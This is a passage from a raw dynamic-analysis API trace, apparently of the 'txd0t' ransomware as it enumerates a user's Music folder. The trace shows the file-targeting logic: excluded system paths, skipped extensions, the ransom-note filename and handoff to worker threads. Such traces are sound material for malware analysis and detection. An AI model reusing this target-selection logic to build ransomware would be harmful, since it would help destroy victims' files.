hHeap=0xe30000) returned 1 [0075.105] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5450cdb0, ftCreationTime.dwHighDateTime=0x1d5e2b4, ftLastAccessTime.dwLowDateTime=0x341c2fc0, ftLastAccessTime.dwHighDateTime=0x1d5e440, ftLastWriteTime.dwLowDateTime=0x341c2fc0, ftLastWriteTime.dwHighDateTime=0x1d5e440, nFileSizeHigh=0x0, nFileSizeLow=0xcb67, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="VO0C5WvUIA8AyL.m4a", cAlternateFileName="VO0C5W~1.M4A")) returned 1 [0075.105] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a", psz2=".") returned 1 [0075.105] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a", psz2="..") returned 1 [0075.105] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0075.105] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0075.105] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="VO0C5WvUIA8AyL.m4a", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a") returned="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" [0075.105] PathFindExtensionW (pszPath="VO0C5WvUIA8AyL.m4a") returned=".m4a" [0075.105] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="bootsect.bak") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="iconcache.db") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="thumbs.db") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2=" ransomware ") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2=" ransom ") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="debug.txt") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="boot.ini") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="desktop.ini") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="autorun.inf") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="ntuser.dat") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="ntldr") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="ntdetect.com") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="bootfont.bin") returned 1 [0075.105] StrCmpIW (psz1="VO0C5WvUIA8AyL.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.105] PathFindExtensionW (pszPath="VO0C5WvUIA8AyL.m4a") returned=".m4a" [0075.105] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0075.105] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.105] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.105] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.125] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.125] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a" [0075.125] SetEvent (hEvent=0x3fc) returned 1 [0075.125] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0xd9d07f90, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0xd9d07f90, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 1 [0075.125] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2=".") returned 1 [0075.125] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2="..") returned 1 [0075.125] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0075.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0075.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="z37nyAMgu2jp3cfWIU", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system32\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\local\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\boot\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\perflogs\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\programdata\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\drivers\\") returned 0x0 [0075.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\wsus\\") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="crypt_detect") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="cryptolocker") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="ransomware") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\WINDOWS") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files") returned 0x0 [0075.126] GetProcessHeap () returned 0xe30000 [0075.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed31f0 [0075.126] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*" [0075.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0xd9d07f90, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0xd9d07f90, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0075.126] StrCmpW (psz1=".", psz2=".") returned 0 [0075.126] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0xd9d07f90, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0xd9d07f90, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.126] StrCmpW (psz1="..", psz2=".") returned 1 [0075.126] StrCmpW (psz1="..", psz2="..") returned 0 [0075.126] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f9e610, ftCreationTime.dwHighDateTime=0x1d5ee03, ftLastAccessTime.dwLowDateTime=0x12962240, ftLastAccessTime.dwHighDateTime=0x1d5ed85, ftLastWriteTime.dwLowDateTime=0x12962240, ftLastWriteTime.dwHighDateTime=0x1d5ed85, nFileSizeHigh=0x0, nFileSizeLow=0x170c3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="5YOR.m4a", cAlternateFileName="")) returned 1 [0075.126] StrCmpW (psz1="5YOR.m4a", psz2=".") returned 1 [0075.126] StrCmpW (psz1="5YOR.m4a", psz2="..") returned 1 [0075.126] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="5YOR.m4a", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" [0075.126] PathFindExtensionW (pszPath="5YOR.m4a") returned=".m4a" [0075.126] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="bootsect.bak") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="iconcache.db") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="thumbs.db") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2=" ransomware ") returned 1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2=" ransom ") returned 1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="debug.txt") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="boot.ini") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="desktop.ini") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="autorun.inf") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="ntuser.dat") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="ntldr") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="ntdetect.com") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="bootfont.bin") returned -1 [0075.127] StrCmpIW (psz1="5YOR.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.127] PathFindExtensionW (pszPath="5YOR.m4a") returned=".m4a" [0075.127] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0075.127] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.127] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.127] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.136] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.136] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" [0075.136] SetEvent (hEvent=0x408) returned 1 [0075.136] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0xba1c8c50, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0xba1c8c50, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="7k19qHZKQ", cAlternateFileName="7K19QH~1")) returned 1 [0075.136] StrCmpW (psz1="7k19qHZKQ", psz2=".") returned 1 [0075.136] StrCmpW (psz1="7k19qHZKQ", psz2="..") returned 1 [0075.136] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="7k19qHZKQ", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system32\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\local\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\boot\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\perflogs\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\programdata\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\drivers\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\wsus\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="crypt_detect") returned 0x0 [0075.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="cryptolocker") returned 0x0 [0075.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="ransomware") returned 0x0 [0075.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\WINDOWS") returned 0x0 [0075.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files") returned 0x0 [0075.137] GetProcessHeap () returned 0xe30000 [0075.137] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e6) returned 0xed36d0 [0075.137] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0075.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\*", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*" [0075.137] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0xba1c8c50, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0xba1c8c50, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0075.137] StrCmpW (psz1=".", psz2=".") returned 0 [0075.137] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0xba1c8c50, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0xba1c8c50, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.137] StrCmpW (psz1="..", psz2=".") returned 1 [0075.137] StrCmpW (psz1="..", psz2="..") returned 0 [0075.137] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7fdbe0, ftCreationTime.dwHighDateTime=0x1d5e9c7, ftLastAccessTime.dwLowDateTime=0x58ec1a0, ftLastAccessTime.dwHighDateTime=0x1d5eff7, ftLastWriteTime.dwLowDateTime=0x58ec1a0, ftLastWriteTime.dwHighDateTime=0x1d5eff7, nFileSizeHigh=0x0, nFileSizeLow=0x4ce3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="UMILH6.mp3", cAlternateFileName="")) returned 1 [0075.137] StrCmpW (psz1="UMILH6.mp3", psz2=".") returned 1 [0075.137] StrCmpW (psz1="UMILH6.mp3", psz2="..") returned 1 [0075.137] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0075.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0075.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="UMILH6.mp3", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" [0075.137] PathFindExtensionW (pszPath="UMILH6.mp3") returned=".mp3" [0075.137] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="bootsect.bak") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="iconcache.db") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="thumbs.db") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2=" ransomware ") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2=" ransom ") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="debug.txt") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="boot.ini") returned 1 [0075.137] StrCmpIW (psz1="UMILH6.mp3", psz2="desktop.ini") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="autorun.inf") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="ntuser.dat") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="ntldr") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="ntdetect.com") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="bootfont.bin") returned 1 [0075.138] StrCmpIW (psz1="UMILH6.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.138] PathFindExtensionW (pszPath="UMILH6.mp3") returned=".mp3" [0075.138] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.138] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.138] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.138] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.142] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.142] StrNCatW (in: psz1="\\\\?\\", 